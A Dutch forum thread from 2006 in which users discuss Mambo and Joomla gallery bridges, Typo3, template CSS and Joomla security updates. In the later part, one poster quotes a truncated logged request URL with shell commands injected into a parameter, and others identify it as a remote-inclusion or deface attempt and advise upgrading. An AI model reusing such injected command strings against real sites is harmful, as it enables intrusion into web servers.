[CMS] Het grote Mambo (en nu ook Joomla) OS topic - deel 1

Pagina: 1 ... 9 ... 11 Laatste
Acties:
  • 84.340 views sinds 30-01-2008

Acties:
  • 0 Henk 'm!

• Nakebod
  • Registratie: Oktober 2000
  • Laatst online: 23:11

Nakebod

Nope.

GsJosh schreef op woensdag 11 januari 2006 @ 03:10:
Mag ik vragen wat tot nu toe het best werkt in Joomla? Coppermine, Gallery of wat anders? Ik wil graag een snel album met niet al teveel functies. Wellicht commentaar posten maar verder niet veel bijzonders. Het zou fijn zijn als zoals in Gallery2 de foto's door middel van een applet met 100den tegelijk geupload kunnen worden.

Anyway, dit blijft een mambo/joomla topic dus ik ga niet teveel door op de gallery keuze. Wat werkt het fijnst in Joomla? Het snelst...? Voorbeelden? Iemand die het heeft draaien?

Ook zou ik graag willen weten waarom je SMF moet installeren wil je Coppermine kunnen gebruiken... :?
Even een beetje offtopic qua Joomla gedeelte, maar misschien relevant aan je keuze :)
Coppermine kent ook een batch mode. Dan kan je gewoon via FTP alle fotos/mappen uploaden in de juiste map, en dan via de webinterface de fotos toevoegen. Hij maakt dan automatisch thumbnails, dus het kan wel vrij zwaar zijn voor de server.

En SMF, misschien voor reacties op de foto's? Dus niet het ingebouwde comment systeem van Coppermine?

Blog | PVOutput Zonnig Beuningen

Acties:
  • 0 Henk 'm!

• Josh
  • Registratie: December 2002
  • Laatst online: 11-12-2021

Josh

A Cloggy in Norway

Dankjewel Nadebod, daar was ik van op de hoogte. Toch is het script van Gallery fijner. Nog fijner is Gallery Remote. Waarmee je met een programma op je PC de foto's kan uploaden en mappen kan maken. Bovendien kan je met gallery Publish XP door middel van Direct Puplish vanuit windows XP de foto's slepen naar het juiste album waarna ze geupload worden. Maar dat zijn allemaal functies die hier niet van pas komen.

Wat ik wel graag van jullie wil weten is wat het snelst is in Joomla? Gallery of Coppermine? Ik heb toch iets betere ervaring met Coppermine, ik heb een aantal joomla/mambo sites gezien ermee en ik was erg tevreden. Ik draai momenteel een gallery2 standalone, die is ook ingebakken in mijn PHPnuke maar in drukke uren wordt dat gewoon echt te langzaam (parsetijden van 20 seconden soms wel). Gallery gebruikt nou eenmaal 16MB en dat is veel! Ik heb op dezelfde host als waar ik zit dit gevonden. Iemand met een Gallery2 op wat volgens mij Mambo is... Het is toch vrij snel.

Ik ben echt compleet nieuw met dit systeem en heb er dus geen verstand van, weet ik dus veel hoe je zo'n systeem als Joomla koppelt aan gallery of coppermine. Ik heb echter wel gelezen dat dit gaat met een zogenaamde bridge. Tot nu toe ben ik nog geen copppermine bridge gevonden wel meerdere gallery bridges. Alle coppermine bridges die ik vind zijn met SMF, een forum. Dat forum wil ik er gewoon niet bij, ik heb het gevoel dat dat de boel vertraagd. Je gaat toch als je naar de kaasboer wil ook niet lopen via de slager?

Even op een rijtje:
• Wat is sneller in Joomla? Gallery2, Gallery of Coppermine?
• Waar kan ik een Joomla bridge vinden voor Coppermine, zonder SMF?
• Ik heb Dit gevonden maar kijk eens naar die parsetijden... Mijn eigen gallery standalone is nog sneller!

[ Voor 15% gewijzigd door Josh op 11-01-2006 13:42 ]

Acties:
  • 0 Henk 'm!

• Mdekoning
  • Registratie: September 2005
  • Laatst online: 30-05 19:20
tja ik zit nu dus ook een beetje rond te kijken, enne is zie weinig verschil tussen joomla en Mambo

ik wil deze gebruiken voor een site voor wat vrienden, de voornaamste dingen die rop moeten zitten zijn een forum en Spelletje met highscores.

Acties:
  • 0 Henk 'm!

• Josh

Josh

A Cloggy in Norway

Die Spelletjes met highscore zijn makkelijk te realiseren, je neemt phpBB en neemt de mod Arcade erbij. Dan regel je alles en kan je netjes spelletjes toevoegen.

Mijn vraag nog steeds,

Hoe integreer ik Coppermine in Joomla? Ik ga phpBB integreren, daar zijn genoeg guides voor, maar hoe integreer je de Coppermine gallery? Ik heb op meerdere sites gezocht en vooral op de officiele Joomla site kom je uit op 2 dingen. Integreren met SMF, maar dat wil ik niet, ik wil phpBB gebruiken als forum. Of www.joombla.com gebruiken en dat weiger ik want dat kost 15 dollar.

Acties:
  • 0 Henk 'm!

• ZOMERZON
  • Registratie: Juni 2001
  • Laatst online: 02-09-2024

ZOMERZON

Voor Geen Cent Gaat De Zon Op

Misschien een vraagje aan de 'programmeurs'

Wat is nou 'echt' het verschil tussen Joomla en eentje die een programmeur zelf heeft geschreven (bijv. in PHP maar ook in ASP of ASP.NET)
Want vaak hoor ik dat programmeurs hun eigen software 'beter' vinden dan andere, en dan helemaal open source software dat helemaal wordt afgekraakt.

Klopt dit ook of is dit voornamelijk omdat programmeurs zich anders gekrenkt voelen in hun gemaakte cms

[ Voor 9% gewijzigd door ZOMERZON op 11-01-2006 21:02 ]

Acties:
  • 0 Henk 'm!

• tabaqui
  • Registratie: Februari 2000
  • Laatst online: 18:34
GsJosh schreef op woensdag 11 januari 2006 @ 19:23:
Die Spelletjes met highscore zijn makkelijk te realiseren, je neemt phpBB en neemt de mod Arcade erbij. Dan regel je alles en kan je netjes spelletjes toevoegen.

Mijn vraag nog steeds,

Hoe integreer ik Coppermine in Joomla? Ik ga phpBB integreren, daar zijn genoeg guides voor, maar hoe integreer je de Coppermine gallery? Ik heb op meerdere sites gezocht en vooral op de officiele Joomla site kom je uit op 2 dingen. Integreren met SMF, maar dat wil ik niet, ik wil phpBB gebruiken als forum. Of www.joombla.com gebruiken en dat weiger ik want dat kost 15 dollar.
Coppermine is te bridgen met mambo, als ik naar de bridge file kijk moet dit ook te doen zijn met mambo, hiervoor moet je alleen wel in de documentatie van coppermine gaan kijken hoe dit moet
handleiding van coppermine m.b.t. bridge

Maak van jouw probleem niet mijn probleem

Acties:
  • 0 Henk 'm!

• R2D2
  • Registratie: Mei 2001
  • Niet online
ZOMERZON schreef op woensdag 11 januari 2006 @ 19:25:
Misschien een vraagje aan de 'programmeurs'

Wat is nou 'echt' het verschil tussen Joomla en eentje die een programmeur zelf heeft geschreven (bijv. in PHP maar ook in ASP of ASP.NET)
Want vaak hoor ik dat programmeurs hun eigen software 'beter' vinden dan andere, en dan helemaal open source software dat helemaal wordt afgekraakt.

Klopt dit ook of is dit voornamelijk omdat programmeurs zich anders gekrenkt voelen in hun gemaakte cms
Voordeel van zelf proggen is dat niemand je source kent, je alles naar je eigen hand kunt zetten en dat je heel stoer kunt zeggen dat je het helemaal zelf gemaakt hebt.

Joomla is makkelijk, kant en klaar, makkelijk uit te breiden met components en modules, geen php kennis voor nodig en het is constant in ontwikkeling en word constant verbeterd door een brede groep mensen wat dus betekent dat er veel kennis is en dat er dus in de basis ook goed werk afgeleverd word.

Ik las ook nog iemand met de vraag wat betreft de verschillen tussen Joomla en Mambo, die zijn er nu nog niet echt maar die komen er in de toekomst wel en dat worden grote verschillen ook. Leg beide roadmaps maar eens naast elkaar en kijk eens wat er de afgelopen tijd aan werk verzet is door de mensen van Joomla...... terwijl er op Mambo niets anders is gebeurd als een paar security patches veel te laat releasen waardoor een hele hoop mambo sites plat zijn gegaan.

iRacing profiel | Sim-Racer.nl

Acties:
  • 0 Henk 'm!

• ZOMERZON

ZOMERZON

Reind schreef op donderdag 12 januari 2006 @ 00:17:
[...]
Voordeel van zelf proggen is dat niemand je source kent, je alles naar je eigen hand kunt zetten en dat je heel stoer kunt zeggen dat je het helemaal zelf gemaakt hebt.

Joomla is makkelijk, kant en klaar, makkelijk uit te breiden met components en modules, geen php kennis voor nodig en het is constant in ontwikkeling en word constant verbeterd door een brede groep mensen wat dus betekent dat er veel kennis is en dat er dus in de basis ook goed werk afgeleverd word.
Dus als ik het goed begrijp is het dus niet meteen beter als er van de grond af een nieuwe cms wordt geprogrammeerd door een programmeur.
Ik bedoel, als je kijkt naar de code van Joomla - is deze dan 'schoon' of is de overzicht ver te zoeken omdat deze open source is ?
En hoe zit het met de veiligheid issues. Veel mensen zeggen dat PHP weer zo lek als een mandje is en dus ASP of .NET prefereren.

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Zowel bij PHP als bij ASP/.NET worden bugs gevonden. Denk dat het qua veiligheid niet veel uitmaakt. Prefereer zelf wel PHP, omdat ik 1, geen Windows server heb, 2, ASP kennis vrijwel nihil is, en PHP is dan iets beter bij mij :P

En de code van Joomla is schoon, duidelijk inspringen, goed leesbaar. En dat is JUIST omdat het open-source is. Als je voor jezelf iets ontwikkeld maakt het niet uit hoe slordig je werkt, als het maar werkt. Maar hier werken veel meer mensen eraan, dus je moet wel structuur houden.
En structuur houden is, ook als je zelf iets bouwt, toch aan te raden. Anders kom je er zelf niet eens uit.

Een groot nadeel is nog dat het hele design tabel gebaseerd is. Hoop dat ze daar vrij snel vanaf stappen, ik dacht dat ik dat een tijd terug ook in de roadmap zag, maar zie het niet echt terug in de roadmap.
Misschien wel dit:
Because of the extensive rationalisation of xhtml output to comply with Useability and Accessibility standards, templates for version 1.3 will likely not be compatible with those produced for early versions of Joomla!.
Maar 1.3 staat pas voor 2006/2007.

Het nadeel van Joomla, en dat is met alle grote systemen, als er eens een exploit gevonden wordt in de scripts, kunnen veel sites hier last van hebben.
Neem als voorbeeld phpBB, redelijk veel exploits gevonden, zoeken op google, veel sites hadden default titel (Powered by..v x.xx) aanstaan, en zo waren er veel sites makkelijk te hacken.
Dus regelmatig kijken voor een update is dan zeker aan te raden.

Maar het nadeel van een eigen systeem vind ik weer dat je alles zelf moet doen, eventuele bugs mag je ook zelf oplossen, en het kost veel meer tijd. Waarom het wiel dat al tientallen keren is uitgevonden (Mambo/Joomla, Drupal, Postnuke, e107, Typo3, Xoops enz..) dan NOG een keer uitvinden?

En er is ook nog een groot voordeel aan Joomla.
Het is installeren en direct te gebruiken.
Veel componenten/mambots/modules beschikbaar (En momenteel ook nog veel Mambo modules die werken.) Mis je een module, kan je altijd nog zelf een module gaan schrijven.

Tot zover dit korte bericht :+

Acties:
  • 0 Henk 'm!

• ZOMERZON

ZOMERZON

Mooie uitleg en alles is voor mij helder :)
Misschien dat anderen ook hun eigen voordelen/nadelen op willen sommen (indien mogelijk) ?

Heb trouwens ook Joomla geinstalleerd.
Inderdaad gewoon snel en overzichtelijk, CSS is standaard niet helemaal 100% maar daar zorg ik wel voor ;)

Wat je bedoelt met die exploits denk ik dat je deze ook wel kent johnny.ihackstuff.com , daar staan ook zat exploits in en snap wel wat je bedoelt dat dit de veiligheid niet echt bevorderd.
Maar zoals met veel beveiligingen en sloten in het algemeen, als iemand (hacker) echt erin wil dan komt 'ie er toch wel in.

Wat bedoel je met design table gebaseerd ?

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Kijk maar eens in de source, je ziet heel veel <table ... gebeuren.
Ook wel veel <div gebeuren, maar nog teveel tabellen. En tabellen zijn niet voor een layout bedoeld.

Acties:
  • 0 Henk 'm!

• djluc
  • Registratie: Oktober 2002
  • Laatst online: 02-06 11:40
ZOMERZON schreef op donderdag 12 januari 2006 @ 14:36:
Mooie uitleg en alles is voor mij helder :)
Misschien dat anderen ook hun eigen voordelen/nadelen op willen sommen (indien mogelijk) ?
Ik heb ook een tijdje voor Mambo geprogrammeerd maar ben tot de conclusie gekomen dat het niet mijn product is. Ik vind het prettiger werken op basis van een wat verder gevorderd framework. Daarom ben ik nu actief bezig met programmeren voor Typo3. Dit project geeft mij meer mogelijkheden om flexibel te werk te gaan omdat er bij dat project wat verder wordt nagedacht over de structuur. Er zijn uitgebreide discussies over wat een ideale aanpak is om zo flexibel mogelijk te blijven en wat toch praktisch is.

Het mooie vind ik dat er concreet projecten georganiseerd worden, er budget wordt gezocht bij sponsoren en er vervolgens projecten snel en efficient uitgevoerd worden. Dit maakt het mogelijk om zeer snel tot een goede oplossing te komen. Bij Mambo en Joomla is alles veel toegankelijker en simpeler wat voordelen heeft maar ook nadelen, het heeft een wat meer hobbyistisch gehalte. Bij Typo3 kom je vrijwel alleen mensen tegen die of open-source belangrijk vinden of bedrijfsmatig met Typo3 werken. Dat is een hele andere cultuur, ze willen daar echt de beste worden.

Wat het beste bij jou aanpak past moet je geheel zelf bepalen. Je kunt proberen welke community i.c.m. het product je het beste bevalt.

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Typo3, is idd een heel andere insteek.
Wat ik erg mooi vind aan Typo3, is dat je de core hebt in een losse dir met een symlink in de echte site, en de site zelf dus gescheiden van de core.
Echter vind ik Joomla veel fijner werken. Ik kon niet echt aan Typo3 wennen toen ik die aan het testen was. Denk dat als ik Typo3 in zou moeten zetten voor een website, de personen die ermee moeten gaan werken hier niet uitkomen.
Die hebben nu al moeite met Joomla :+

Acties:
  • 0 Henk 'm!

• djluc
  • Registratie: Oktober 2002
  • Laatst online: 02-06 11:40
Nakebod schreef op donderdag 12 januari 2006 @ 16:14:
Typo3, is idd een heel andere insteek.
Wat ik erg mooi vind aan Typo3, is dat je de core hebt in een losse dir met een symlink in de echte site, en de site zelf dus gescheiden van de core.
Echter vind ik Joomla veel fijner werken. Ik kon niet echt aan Typo3 wennen toen ik die aan het testen was. Denk dat als ik Typo3 in zou moeten zetten voor een website, de personen die ermee moeten gaan werken hier niet uitkomen.
Die hebben nu al moeite met Joomla :+
Dat kan ik me helemaal voorstellen. Daarom komt er binnen een maand een eerste nieuwe backend-interface. Sowieso werken ze bij ons vrijwel niet in de backend, iedereen heeft van die pennetjes in de website staan waarmee ze meteen de tekst/afbeeldingen enzovoorts kunnen wijzigen. Als je een "domme" user in die backend dropt is dat ongeveer vergelijkbaar met iemand die niet kan zwemmen met een zwembandje in de oceaan dumpen, niet aan te raden dus ;)

Acties:
  • 0 Henk 'm!

• R2D2
  • Niet online
djluc schreef op donderdag 12 januari 2006 @ 16:27:
[...]
Dat kan ik me helemaal voorstellen. Daarom komt er binnen een maand een eerste nieuwe backend-interface. Sowieso werken ze bij ons vrijwel niet in de backend, iedereen heeft van die pennetjes in de website staan waarmee ze meteen de tekst/afbeeldingen enzovoorts kunnen wijzigen. Als je een "domme" user in die backend dropt is dat ongeveer vergelijkbaar met iemand die niet kan zwemmen met een zwembandje in de oceaan dumpen, niet aan te raden dus ;)
Typo 3 heeft ook een ogelofelijk stijle leer curve. Ik gebruik het nu zelf op een test server om de horizon een beetje te vrbreden op cms gebied maar Typo 3 is gewoon een zware kluif en voor heeeeeeel veel mensen gewoon niet te doen. Het CMS is flexibeler en krachtiger maar daardoor naar mijn mening niet meteen beter. Bij Typo3 heb je namelijk ook een hele hoop kennis nodig en is de community een stuk kleiner waardoor je meer en meer zelf in staat moet zijn de problemen op te lossen.

Joomla is gewoon een leuk all in one pakket wat standaard al goed draait en goed werkt en naar mijn mening 1 van de betere cms'en is op dit moment voor het brede publiek. Aangezien ik niet alleen aan de website werk kies ik dus voor Joomla, want daar kan iedere randdebiel wel mee werken als je alles een beetje uitgelegt hebt.

Acties:
  • 0 Henk 'm!

• R2D2
  • Niet online
ZOMERZON schreef op donderdag 12 januari 2006 @ 14:36:
Inderdaad gewoon snel en overzichtelijk, CSS is standaard niet helemaal 100% maar daar zorg ik wel voor ;)
Heeft niets met Joomla te maken maar met de template die je gebruikt. Gebruik je een valid template dan is Joomla ook gewoon valid.

Ik ben zelf een aardige tijd bezig geweest met mijn eigen template en alles draait nu als een zonnetje en komt vlekkeloos door de W3C keuring heen. En het enige wat ik veranderd heb is hier en daar een extra <br /> in de core en een nieuwe template gebouwd.

Acties:
  • 0 Henk 'm!

• raptorix
  • Laatst online: 17-02-2022
Een korte vraag, ik heb eindelijk joomla werkend gekregen op me windows machine (helaas nog wel via apache), ik dacht dat joomla de mogelijkheid had om via CMS zelf "contenttypes" aan te maken, dus ik wil bijvoorbeeld een nieuw type: muziekcd aanmaken waar ik zelf de velden definieer, bijvoorbeeld:

-Titel
-Jaar van Uitgave
-Tracks
-Frontcover

Is dit mogelijk via het cms? Zo nee, wat is de gebruikelijke workaround om dit voormekaar te krijgen?

[ Voor 14% gewijzigd door raptorix op 12-01-2006 19:39 ]

Acties:
  • 0 Henk 'm!

• Josh

Josh

A Cloggy in Norway

Weet iemand hoe ik de Mambo bridge van Coppermine gebruik voor Joomla?

Het gaat dus om het bestand mambo.inc.php in de map bridge van coppermine. Deze kan je aanroepen via (coppermin) admin tootls > bridge manager. Ik wil dus graag coppermine integreren in Joomla maar dat lukt niet. Help?!

Acties:
  • 0 Henk 'm!

Anoniem: 147465

Als je enkel je foto's en albums wilt weergeven, kan je mss met de wrapper iets doen. Je maakt gewoon zo'n link naar je index van coppermine en je hebt je foto's op je site.

'k ben eergistern begonnen met een nieuwe Joomla site. http://pure-gaming.ultis.net

Nu heb ik het volgende probleem:
ik kan geen component vinden die automatisch een google sitemap aanmaakt. vroeger in mambo had ik die wel.

iemand een idee?

edit: hoe copermine te integreren ;-)

dit is ook een bridge

[ Voor 23% gewijzigd door Anoniem: 147465 op 12-01-2006 23:02 ]

Acties:
  • 0 Henk 'm!

• tabaqui
  • Laatst online: 18:34
als je de naam van de component wilt noemen of een url wilt geven wil ik wel kijken of ik dat kan verbouwen voor je.

zie net ook dat cpg ondertussen al naar versie 1.4.3 is, oftewel tijd om zelf eens te gaan upgraden en daarna misschien te kijken of de mambo bridge ook meteen aangepast kan worden naar een joomla bridge :)

[ Voor 48% gewijzigd door tabaqui op 13-01-2006 01:00 ]

Maak van jouw probleem niet mijn probleem

Acties:
  • 0 Henk 'm!

• Josh

Josh

A Cloggy in Norway

Dat zou heeeel erg gaaf zijn. Ik sta op het punt om CoppermineVis te kopen voor 15$ die dus Coppermine in Joomla integreerd maar wanneer er een goede bridge voor beschikbaar is (gratis) spring ik een gat in de lucht!

Wanneer komt hij? :P

Acties:
  • 0 Henk 'm!

Anoniem: 147465

hier zijne de mambo componenten voor coppermine. nu die gewoon nog aanpassen ;-)

Acties:
  • 0 Henk 'm!

• Josh

Josh

A Cloggy in Norway

Ik heb nu dit gebruikt voor integratie en dat werkt goed (met wrapper)

Kan iemand me vertellen hoe ik de background verander van de template (madeyourweb)? In de CSS staat het volgende:
code:
1
2
3
4
5
6
body{
margin:0;
padding:0;
text-align: center;
font-family: verdana, arial, sans-serif;
}

Dit heb ik veranderd naar:
code:
1
2
3
4
5
6
7
body{
background: #EEEEEE;
margin:0;
padding:0;
text-align: center;
font-family: verdana, arial, sans-serif;
}

Maar de kleur blijft wit. Hier kan je de index en CSS van de Template vinden Klik Doel opslaan als!. Site is hier te vinden. Als je op het forum klikt zorgt het forum ervoor dat de background WEL #CCCCCC wordt. Ik wil de hele site die kleur zo. Hoe?

Bovendien, over diezelfde file... Hoe krijg ik de template breder? Ik heb het volgende gedaan maar dat werkt niet:
code:
1
2
#pagewidth-800{
width:770px;

Replaced with
code:
1
2
#pagewidth-800{
width:900px;

Iemand met verstand hiervan?

[ Voor 18% gewijzigd door Josh op 15-01-2006 05:34 ]

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Joomla! 1.0.6 will be released on Sunday January 15, 2006.

This will be a Security Release. This means it contains several Security Fixes:

* 7 `Low Level` Threat fixes
* 50+ non-critical bug fixes

Although none of these Security Threats are seen as critical, we recommend people to upgrade to this version.
If you are using SEF you are advised to upgrade to this version as it fixes a problem with SEF handling in 1.0.5
Dus vanavond misschien even upgraden naar 1.0.6 :)
Ondertussen ga ik even op zoek naar een beetje leuke themes. Voor mijn werk heb ik ze tot nu toe altijd zelf gebouwd, vrij eenvoudige themes.
Maar heb voor mijn eigen site deze keer niet zoveel zin om zelf te beginnen :P

Acties:
  • 0 Henk 'm!

• Peter
  • Registratie: Januari 2005
  • Laatst online: 31-05 21:41
Mooi dat de fix er eindelijk komt, ik heb al zóveel exploits moeten verwijderen wegens een bug in Joomla (werk bij een webhosting bedrijf), hopen dat de boel nu gedicht is.

Acties:
  • 0 Henk 'm!

• timovd
  • Registratie: Maart 2002
  • Laatst online: 18:52

timovd

Voorsprong door techniek

1.07 is nu al beschikbaar? Gaat wel heel erg snel. :s

Gasloos huis 9kW Panasonic WH-MDC09J3E5 | Atlantic Explorer V4 270L | 8715Wp @ SMA Tripower 6.0-3AV-40 (4150Wp NO, 4565Wp ZW)

Acties:
  • 0 Henk 'm!

Anoniem: 161990

timow schreef op maandag 16 januari 2006 @ 00:46:
1.07 is nu al beschikbaar? Gaat wel heel erg snel. :s
Tja, wat wil je wanneer 1.06 het root-password wist.
8)7 :D

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Niet het root password, maar wel je database pwd in de config overschrijft met niets.
Wel een vaag bugje an sich, maar waarschijnlijk hebben niet veel mensen er last van gehad. En als ik het zo lees, zou die bug, als je er last van zou hebben, handmatig op te lossen zijn. Gewoon config.php openen, je database wachtwoord weer invullen, klaar.

Acties:
  • 0 Henk 'm!

• LuNaTiC
  • Niet online

LuNaTiC

Olijke schavuit

Ik heb nu BSQ Sitestats als component geinstalleerd zodat we in de backend een beetje kunnen bekijken wie wat hoe vaak ongeveer doet. Nu kwam ik bij een Chinees IP de volgende URL tegen:

http://www.onzesite.nogie...;./listen;echo%20YYY;echo|

81.174.26.111 is een Italiaans IP
en 216.15.209.12 is een Canadees IP

Iemand enig idee wat deze mijnheer probeerde? Was ie op zoek naar exploits oid? Ik vraag dit omdat deze Joomla versie niet up-to-date is (1.0.0 zelfs nog volgens mij :X). Dit omdat de site na een hoop geknutsel eindelijk draait zoals men ongeveer wil, en er vooral qua rechtenstructuur veel aan veranderd is. Dat zal een upgrade dan wat bemoeilijken.

Nu wil ik echter ook niet het risico lopen dat men in kan breken uiteraard. Is het nog safe of moet er echt geupgrade worden?

My own opinion is enough for me, and I claim the right to have it defended against any consensus, any majority, anywhere, any place, any time. And anyone who disagrees with this can pick a number, get in line, and kiss my ass. - Christopher Hitchens

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Het lijkt, alsof de Chinees vanaf je site, via een zogenaamd absolute_path op de Canadese site, iets wget vanaf de Italiaan.
En als je het mij vraagt, lijkt het op: http://forum.joomla.org/index.php/topic,25549.0.html Deface poging. Weet niet of ie gelukt is, maar toch, er zijn sinds 1.0.0 redelijk wat security dingen gefixt.
Ik zeg: Backup van je data, backup je db, en dan upgrade naar 1.0.1, 1.02, 1.03, 1.04, 1.05 en daarna naar 1.07.
Het kan als goed is niet in 1x.

Acties:
  • 0 Henk 'm!

• P_de_B
  • Registratie: Juli 2003
  • Niet online
Dit lijkt mij echt op een hackpoging, ze proberen remote content te injecteren in je site lijkt het op. Ik zou zeker gaan upgraden. Dat is het nadeel van een standaard CMS, als er een exploit is zijn er altijd mensen die er op grote schaal misbruik van maken.

Upgraden dus, en omdat je het JACL component gebruikt zul je het denk ik in stapjes moeten doen. Upgraden naar 1.1 en JACL upgraden naar 1.1, upgraden naar 1.2 en jacl upgraden naar 1.2 etc etc. Ik weet trouwens niet of JACL dit hele pad nog ondersteunt.

Oops! Google Chrome could not find www.rijks%20museum.nl

Acties:
  • 0 Henk 'm!

• LuNaTiC
  • Niet online

LuNaTiC

Olijke schavuit

Pffff, drama dus. Nou, ik zal het eens in de group gooien :+

My own opinion is enough for me, and I claim the right to have it defended against any consensus, any majority, anywhere, any place, any time. And anyone who disagrees with this can pick a number, get in line, and kiss my ass. - Christopher Hitchens

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Dat BSQ Sitestats ziet er trouwens erg netjes uit :) Heb dat ding nu ook runnen op mijn site.
Ook eens op een paar sites voor mijn werk doen. Een beetje inzicht krijgen in die 2 bezoekers per week :P

Hoe log je eigenlijk de backend?
Op dezelfde manier als de frontend? Dus die paar regels code in je admin template?
Kan je dan wel makkelijk stats van front en back-end los van elkaar zien?

En laatste edit, denk ik :P
Gewoon in admin template gegooid, lijkt tot nu toe allemaal wel te werken.
Ik zie alleen bij de settings, wel een tabje Frontend, hoort daar ook Backend bij, of is dat sowiezo niet de bedoeling? Hij logt verder wel nu.

[ Voor 58% gewijzigd door Nakebod op 16-01-2006 09:47 ]

Acties:
  • 0 Henk 'm!

• LuNaTiC
  • Niet online

LuNaTiC

Olijke schavuit

Die antwoorden moet ik je schuldig blijven... :) Hier wordt alleen de frontend gelogd. Backend is hier minder interessant voor het bedrijf nl :

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Ah ok, nouwja, kan hier ook prima mee leven :)
BTW: Je lange url fokt wel een beetje :P Heel veel scrollbar :D

Acties:
  • 0 Henk 'm!

• LuNaTiC
  • Niet online

LuNaTiC

Olijke schavuit

hmm geen last van? Welke GoT-template gebruik je? :P

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Heb hier Nightlife, maar een snelle test gaf het ook met Grijs en Beige.
Hij kapt je url af bij index2.php en vanaf het ?... staat alles gewoon op dezelfde regel.
Layout is niet opgefokt, maar wel een scrollbar :P

Acties:
  • 0 Henk 'm!

• LuNaTiC
  • Niet online

LuNaTiC

Olijke schavuit

Hmm in FF heb ik dat ook ja (surf hier via het werk voornamelijk met IE)

Acties:
  • 0 Henk 'm!

• P_de_B
  • Niet online
offtopic:
Eigenlijk moet je ook de [url=] tags gebruiken als je zulke lange urls plaatst.

[ Voor 4% gewijzigd door P_de_B op 16-01-2006 10:18 ]

Acties:
  • 0 Henk 'm!

• LuNaTiC
  • Niet online

LuNaTiC

Olijke schavuit

Nog even gekeken, draait hier nu 1.0.3.

als ik kijk hier naar: http://developer.joomla.o...omla/frs.joomla_1_0.1_0_7

die patch geldt dus alleen als je niet gebruik maakt van JACLPlus? Dus anders toch via dat stappenplan ? (JACLPlus! gaat geloof ik tot en met 1.0.5 als ik me niet vergis)

Acties:
  • 0 Henk 'm!

• P_de_B
  • Niet online
Je zult moeten wachten op een update van JACLPlus, er zijn door de installatie van JACLplus core files aangepast die bij een upgrade van Joomla weer verloren gaan.

Acties:
  • 0 Henk 'm!

• LuNaTiC
  • Niet online

LuNaTiC

Olijke schavuit

verre van ideaal dus allemaal... lijkt er op alsof ze upgraden hier ook niet zo zien zitten :P (aangezien ze nog hier en daar wat custom aanpassingen hebben gedaan). Dus het lijkt er op dat ze gewoon op basis van IP-toegang gaan werken hier... nouja kan ook.

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Dat vind ik ook het "jammere" van JACLplus, omdat het een hack is, zit je erg gebonden aan de updates van hun.
Als Joomla nu een goede ACL had, dus als basis, dan had ik waarschijnlijk Joomla kunnen gebruiken voor een site.
Heb het niet zo op hacks.

Acties:
  • 0 Henk 'm!

• low_n_slow
  • Registratie: Juli 2001
  • Laatst online: 27-05 17:15
Okay ik heb joomla nou voor het eerst geprobeert en het is echt een super pakket!
er is alleen 1 maar!

Waarom geeft hij de plaatjes niet weer? Intern (localhost) doet hij dat wel maar zodra iemand via mijn ip joomla aanspreekt ziet diegene alleen de tekst en voor de rest niks.

Kan het zijn dat ik te weinig poorten heb openstaan op mijn router? Of is het een instelling van joomla wat ik niet goed heb staan...

ik gebruik Wamp als webserver.

cmssimple geeft ie wel goed weer.

Acties:
  • 0 Henk 'm!

• timovd

timovd

Voorsprong door techniek

waarschijnlijk staat in config.php 127.0.0.1 i.p.v. het externe IP of de URL.

Gasloos huis 9kW Panasonic WH-MDC09J3E5 | Atlantic Explorer V4 270L | 8715Wp @ SMA Tripower 6.0-3AV-40 (4150Wp NO, 4565Wp ZW)

Acties:
  • 0 Henk 'm!

• R2D2
  • Niet online
LuNaTiC schreef op maandag 16 januari 2006 @ 13:35:
verre van ideaal dus allemaal... lijkt er op alsof ze upgraden hier ook niet zo zien zitten :P (aangezien ze nog hier en daar wat custom aanpassingen hebben gedaan). Dus het lijkt er op dat ze gewoon op basis van IP-toegang gaan werken hier... nouja kan ook.
Je realiseerd je wel dat versie 1.0 een aantal serieuze security leaks heeft en dat van versie 1.0 tot 1.0.7 niet anders zijn geweest dan update's voor vooral lichte maar toch ook een paar redelijk zware leaks.....

Niet updaten is volgens mij echt vragen om problemen. Custom aanpassingen in source code's haal je er zo uit met winmerge en verwerk je d.m.v een copy en paste in de nieuwe code.

Ik zou als ik jou was toch maar even een test omgeving aan maken met 1.0.7 en even kijken in hoeverre alles makkelijk aan de praat te krijgen is...... alleen toegang op basis van ip is natuurlijk een lekkere franse slag oplossing ;-)

Acties:
  • 0 Henk 'm!

• low_n_slow
  • Laatst online: 27-05 17:15
timow schreef op maandag 16 januari 2006 @ 20:29:
waarschijnlijk staat in config.php 127.0.0.1 i.p.v. het externe IP of de URL.
en waar stel ik dat in? ik heb echt geen flauw idee :D
wat ik zo kan zien is dit het niet... maar nou ben ik dan ook geen expert op dit gebied...
iemand een ander ideetje?

Acties:
  • 0 Henk 'm!

• Peter
  • Registratie: Januari 2005
  • Laatst online: 31-05 21:41
LuNaTiC schreef op maandag 16 januari 2006 @ 09:00:
Ik heb nu BSQ Sitestats als component geinstalleerd zodat we in de backend een beetje kunnen bekijken wie wat hoe vaak ongeveer doet. Nu kwam ik bij een Chinees IP de volgende URL tegen:

http://www.onzesite.nogie...;./listen;echo%20YYY;echo|

81.174.26.111 is een Italiaans IP
en 216.15.209.12 is een Canadees IP

Iemand enig idee wat deze mijnheer probeerde? Was ie op zoek naar exploits oid? Ik vraag dit omdat deze Joomla versie niet up-to-date is (1.0.0 zelfs nog volgens mij :X). Dit omdat de site na een hoop geknutsel eindelijk draait zoals men ongeveer wil, en er vooral qua rechtenstructuur veel aan veranderd is. Dat zal een upgrade dan wat bemoeilijken.

Nu wil ik echter ook niet het risico lopen dat men in kan breken uiteraard. Is het nog safe of moet er echt geupgrade worden?
Met 1.05 heb ik nog exact hetzelfde probleem, alleen hier dan met een IRC bot die moet gaan draaien. In de tmp dir wordt een perl botje neergezet, en uitvoerd tot de gebruiker hem stopt. Hier heeft dat tot pieken tot wel 60MBit geleidt. Wat de jouwe doet kan ik niet zien, gezien dat IP niet werkt.

